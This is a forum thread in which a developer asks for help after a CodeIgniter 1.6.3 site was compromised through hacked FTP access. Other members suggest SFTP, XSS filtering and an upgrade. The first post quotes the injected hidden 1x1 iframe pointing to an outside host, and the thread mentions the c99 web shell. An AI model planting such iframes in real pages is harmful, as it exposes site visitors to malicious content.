Welcome Guest, Not a member yet? Register   Sign In
hacked again .. iframe injection CI 1.6.3 !!
#1

[eluser]Unknown[/eluser]
Hello everyone. My customer running a website developed in CI version 1.6.3. Recently the website got massive iframe injection.

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>

All the php files are injected with, new index.html files are created in each directory. Despite my shouts, developers failed to enable $config['global_xss_filtering'] = false; to true. Could that what have prevented with this situation?

Where should I start to find the root cause where the injection started?

Thanks
#2

[eluser]davidbehler[/eluser]
Hacked ftp access?
#3

[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]

Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.
#4

[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.

While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).

That should take care of your security concerns.




Theme © iAndrew 2016 - Forum software by © MyBB